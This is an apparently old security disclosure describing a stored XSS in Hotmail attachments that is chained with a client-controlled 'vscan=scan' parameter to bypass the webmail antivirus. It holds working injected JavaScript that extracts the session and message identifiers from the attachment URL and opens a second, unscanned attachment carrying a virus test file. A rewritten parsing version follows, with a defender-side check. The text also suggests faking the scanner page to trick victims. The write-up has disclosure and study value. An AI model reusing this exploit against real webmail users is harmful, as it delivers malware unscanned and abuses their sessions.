To show a practical exploit of the XSS on the Hotmail webmail server, let's do something
dirty: let's force the target user to do something he would never have allowed:
downloading a virus (from Hotmail, of course) :-)
I was thinking of some kind of mailbox access, but that would have needed ActiveX, and some
people could object: "I do not allow ActiveX in my browser..." or "I run Mozilla...", etc.
So the challenge has been to show how, with JavaScript alone, an XSS that is theoretically
non-exploitable (no access to cookies), plus a misconfiguration on the Hotmail webmail
server, can result in a serious security problem.
1) I know XSS is present (in file attachments) (good)
2) No access to cookies from the injected code (bad)
3) It is not a flaw in input filtering; any script code is allowed (good)
4) I don't know if there is any kind of IP-based session tracking (bad)
5) Redirecting the output of client requests forced by the XSS code is possible (good)
6) The code needed to successfully exploit the redirection (ActiveX, extended XML, ...)
is browser dependent (bad)
So the only room I have to play in is JavaScript (exploiting the XSS with HTML
injection only doesn't seem to be effective in this case...).
If we take a look at the URL from which attachments are opened, we can see the session
identifier and the message identifier. With this info we can build a request to...
the same message we have sent?
Yes, yes, yes. The same message (same identifier) can have many attachments...
We can make a request to the same message but a different attachment...
Why this??? Imagine that we could bypass the antivirus software with only a little
modification of the HTTP request... We could not do this with the same attachment in
which we send our XSS code, because that one is opened directly by the target's browser,
but we could still force a crafted request from our XSS code to open a different
attachment (of the same message), without calling the AV software. :-)
How to bypass the AV software...
This is a sample URL to get an attachment from Hotmail:
http://by7fd.bay7.hotmail.msn.com/cgi-bin/getmsg?curmbox=F000000001&a=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX&msg=MSGXXXXXXXXXX.XX&start=XXXXXXX&len=XXXX&mimepart=3&vscan=scan
"vscan=scan" ... ummm... Remove this, and the antivirus will not be called! Whether the
attachment is scanned is decided by a parameter the client supplies, so the server
trusts the request to ask for its own scan. Scared? Wait... :-)
Now let's send the target user a mail with two attachments.
The first one with this code:
---------------------------------------------------------------------------------------------
<html>
<script>
// document.URL is the getmsg URL of this very attachment; it carries the
// session identifier (a=...) and the message identifier (msg=...).
str1=document.URL
// Cut out the "a=...&msg=..." part. The offsets depend on the exact URL
// layout (see the note below), which is why this is only a proof of concept.
str2=str1.slice(55,110)
splitString = str2.split("&")
// Keep only the two identifiers we need: the value of a, then "msg=...".
str3=splitString[0]+"&"+splitString[1]
// Request attachment 4 of the same message, without vscan=scan,
// so the antivirus is never called.
window.open('http://by7fd.bay7.hotmail.msn.com/cgi-bin/getmsg?curmbox=F000000001&a='+str3+'&mimepart=4')
</script>
</html>
----------------------------------------------------------------------------------------------
Notice that to make this code work in any environment, you will have to use "split"
and not "slice". This is a proof-of-concept exploit. The only important thing is to
extract the user and message identifiers, no matter how you achieve it. If this code
doesn't work for you, try changing slice(X,Y).
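The same extraction done with "split" instead of fixed offsets, as an added example written for this page (it is not the original proof-of-concept code). It parses the query string of the current attachment URL, keeps only curmbox, a and msg, drops vscan=scan and asks for a different mimepart; it also shows the check a server should apply, since a getmsg request is only "scanned" if vscan=scan is present. The host and parameter names come from the sample URL above; the identifier values in the sample are constructed placeholders, and the function names are mine.

```javascript
// Added example, not the advisory's own code. Rebuilds the "unscanned"
// attachment URL by parsing the query string instead of slicing fixed offsets.
// Inside the real attachment this would be fed document.URL.

const ATTACHMENT_PARAMS = ['curmbox', 'a', 'msg']; // what the second request must keep

// Return the URL of attachment `mimepart` of the same message, with the
// vscan=scan parameter (the AV trigger) removed. Returns null if the URL
// does not look like a Hotmail getmsg attachment request.
function buildUnscannedAttachmentUrl(currentUrl, mimepart) {
  const url = new URL(currentUrl);
  if (!url.pathname.endsWith('/cgi-bin/getmsg')) return null;
  const src = url.searchParams;
  const out = new URLSearchParams();
  for (const name of ATTACHMENT_PARAMS) {
    const value = src.get(name);
    if (value === null) return null; // without session/message id nothing can be forged
    out.set(name, value);
  }
  out.set('mimepart', String(mimepart));
  // Deliberately not copying vscan, start or len: vscan triggers the AV,
  // start/len belong to the attachment we are already viewing.
  return `${url.origin}${url.pathname}?${out.toString()}`;
}

// Defender-side view of the same weakness: a getmsg request that omits
// vscan=scan (or sends another value) was never scanned and must not be
// served as if it had been.
function requestSkipsScan(requestUrl) {
  const url = new URL(requestUrl);
  return url.searchParams.get('vscan') !== 'scan';
}

// Constructed sample (identifier values are placeholders, like the X's in
// the advisory's sample URL).
const sample =
  'http://by7fd.bay7.hotmail.msn.com/cgi-bin/getmsg?curmbox=F000000001' +
  '&a=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&msg=MSG1234567890.12&start=100&len=2048' +
  '&mimepart=3&vscan=scan';
const forged = buildUnscannedAttachmentUrl(sample, 4);
// In the browser the injected script would now do window.open(forged).
```

The query-string approach does not care where the identifiers sit in the URL, which is exactly the fragility the slice(X,Y) version has; the defender function is the one-line rule the server was missing.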
The second attachment will be a virus test file (for example EICAR).
Once the target opens the first attachment, the AV software will tell him that
everything is OK, but when he tries to download the file, it will be opened "online",
the XSS code will be executed and:
-the session ID and message ID will be retrieved
-a new window will be opened pointing to the second attachment, but without calling
the AV software
What does the user see?
He will see that he can download the file, without any AV warning, and he will see
that he is downloading from Hotmail.
An experienced user may notice that something strange is happening... but it is still
possible to trick him by opening a page similar to the one shown when the AV software
is called... As always, the only limit is the imagination of the attacker.
Conclusions:
-XSS is present on Hotmail
-The Hotmail antivirus software can easily be bypassed by exploiting this XSS
-Users of Hotmail are at high risk
A new generation of XSS is coming...
[Screenshots: XSS; AV bypass (screenshot1, screenshot2, screenshot3, screenshot4)]